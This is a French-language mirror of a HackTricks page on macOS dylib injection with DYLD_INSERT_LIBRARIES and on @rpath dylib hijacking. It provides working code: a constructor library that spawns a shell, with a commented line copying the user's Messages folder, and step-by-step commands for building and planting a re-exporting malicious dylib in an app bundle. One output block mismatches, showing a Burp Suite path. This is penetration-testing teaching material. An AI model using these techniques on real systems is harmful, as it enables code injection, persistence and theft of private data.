mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-09 11:48:51 +00:00
186 lines
7.7 KiB
Markdown
186 lines
7.7 KiB
Markdown
|
# macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
Autres façons de soutenir HackTricks:
|
||
|
|
||
|
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
|
||
|
|
||
|
</details>
|
||
|
|
||
|
## DYLD\_INSERT\_LIBRARIES Exemple de base
|
||
|
|
||
|
**Bibliothèque à injecter** pour exécuter un shell:
|
||
|
```c
|
||
|
// gcc -dynamiclib -o inject.dylib inject.c
|
||
|
|
||
|
#include <syslog.h>
|
||
|
#include <stdio.h>
|
||
|
#include <unistd.h>
|
||
|
#include <stdlib.h>
|
||
|
__attribute__((constructor))
|
||
|
|
||
|
void myconstructor(int argc, const char **argv)
|
||
|
{
|
||
|
syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]);
|
||
|
printf("[+] dylib injected in %s\n", argv[0]);
|
||
|
execv("/bin/bash", 0);
|
||
|
//system("cp -r ~/Library/Messages/ /tmp/Messages/");
|
||
|
}
|
||
|
```
|
||
|
Binaire à attaquer:
|
||
|
```c
|
||
|
// gcc hello.c -o hello
|
||
|
#include <stdio.h>
|
||
|
|
||
|
int main()
|
||
|
{
|
||
|
printf("Hello, World!\n");
|
||
|
return 0;
|
||
|
}
|
||
|
```
|
||
|
Injection :
|
||
|
|
||
|
La bibliothèque dynamique (Dynamic Link Library - DLL) hijacking est une technique utilisée pour charger une bibliothèque malveillante dans un processus légitime en exploitant la façon dont le chargeur dynamique (dyld) de macOS recherche et charge les bibliothèques partagées. Cette technique peut être utilisée pour obtenir des privilèges élevés ou pour exécuter du code malveillant de manière furtive.
|
||
|
```bash
|
||
|
DYLD_INSERT_LIBRARIES=inject.dylib ./hello
|
||
|
```
|
||
|
## Exemple de Dyld Hijacking
|
||
|
|
||
|
Le binaire vulnérable ciblé est `/Applications/VulnDyld.app/Contents/Resources/lib/binary`.
|
||
|
|
||
|
{% tabs %}
|
||
|
{% tab title="entitlements" %}
|
||
|
<pre class="language-bash" data-overflow="wrap"><code class="lang-bash">codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
|
||
|
<strong>[...]com.apple.security.cs.disable-library-validation[...]
|
||
|
</strong></code></pre>
|
||
|
{% endtab %}
|
||
|
|
||
|
{% tab title="LC_RPATH" %}
|
||
|
{% code overflow="wrap %}
|
||
|
```bash
|
||
|
# Check where are the @rpath locations
|
||
|
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2
|
||
|
cmd LC_RPATH
|
||
|
cmdsize 32
|
||
|
path @loader_path/. (offset 12)
|
||
|
--
|
||
|
cmd LC_RPATH
|
||
|
cmdsize 32
|
||
|
path @loader_path/../lib2 (offset 12)
|
||
|
```
|
||
|
{% endcode %}
|
||
|
{% endtab %}
|
||
|
|
||
|
{% tab title="@rpath" %}
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
# Check librareis loaded using @rapth and the used versions
|
||
|
otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3
|
||
|
name @rpath/lib.dylib (offset 24)
|
||
|
time stamp 2 Thu Jan 1 01:00:02 1970
|
||
|
current version 1.0.0
|
||
|
compatibility version 1.0.0
|
||
|
# Check the versions
|
||
|
```
|
||
|
Avec les informations précédentes, nous savons qu'il **ne vérifie pas la signature des bibliothèques chargées** et qu'il **essaie de charger une bibliothèque depuis** :
|
||
|
|
||
|
- `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib`
|
||
|
- `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib`
|
||
|
|
||
|
Cependant, le premier n'existe pas :
|
||
|
```bash
|
||
|
pwd
|
||
|
/Applications/VulnDyld.app
|
||
|
|
||
|
find ./ -name lib.dylib
|
||
|
./Contents/Resources/lib2/lib.dylib
|
||
|
```
|
||
|
Donc, il est possible de le pirater ! Créez une bibliothèque qui **exécute un code arbitraire et exporte les mêmes fonctionnalités** que la bibliothèque légitime en les réexportant. Et n'oubliez pas de la compiler avec les versions attendues :
|
||
|
|
||
|
{% code title="lib.m" %}
|
||
|
```objectivec
|
||
|
#import <Foundation/Foundation.h>
|
||
|
|
||
|
__attribute__((constructor))
|
||
|
void custom(int argc, const char **argv) {
|
||
|
NSLog(@"[+] dylib hijacked in %s", argv[0]);
|
||
|
}
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Compilez-le :
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib"
|
||
|
# Note the versions and the reexport
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Le chemin de réexportation créé dans la bibliothèque est relatif au chargeur, changeons-le pour un chemin absolu vers la bibliothèque à exporter :
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
#Check relative
|
||
|
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
|
||
|
cmd LC_REEXPORT_DYLIB
|
||
|
cmdsize 48
|
||
|
name @rpath/libjli.dylib (offset 24)
|
||
|
|
||
|
#Change the location of the library absolute to absolute path
|
||
|
install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib
|
||
|
|
||
|
# Check again
|
||
|
otool -l /tmp/lib.dylib| grep REEXPORT -A 2
|
||
|
cmd LC_REEXPORT_DYLIB
|
||
|
cmdsize 128
|
||
|
name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24)
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Enfin, il suffit de le copier à l'**emplacement détourné** :
|
||
|
|
||
|
{% code overflow="wrap" %}
|
||
|
```bash
|
||
|
cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib"
|
||
|
```
|
||
|
{% endcode %}
|
||
|
|
||
|
Et **exécutez** le binaire et vérifiez que la **bibliothèque a été chargée** :
|
||
|
|
||
|
<pre class="language-context"><code class="lang-context">"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
|
||
|
<strong>2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
|
||
|
</strong>Usage: [...]
|
||
|
</code></pre>
|
||
|
|
||
|
{% hint style="info" %}
|
||
|
Un bon article sur la façon d'exploiter cette vulnérabilité pour abuser des autorisations de caméra de Telegram peut être trouvé sur [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/)
|
||
|
{% endhint %}
|
||
|
|
||
|
## Plus grande échelle
|
||
|
|
||
|
Si vous envisagez d'essayer d'injecter des bibliothèques dans des binaires inattendus, vous pourriez vérifier les messages d'événement pour savoir quand la bibliothèque est chargée à l'intérieur d'un processus (dans ce cas, supprimez le printf et l'exécution de `/bin/bash`).
|
||
|
```bash
|
||
|
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"'
|
||
|
```
|
||
|
<details>
|
||
|
|
||
|
<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert de l'équipe rouge HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||
|
|
||
|
D'autres façons de soutenir HackTricks:
|
||
|
|
||
|
* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)!
|
||
|
* Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
|
||
|
* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family)
|
||
|
* **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||
|
* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|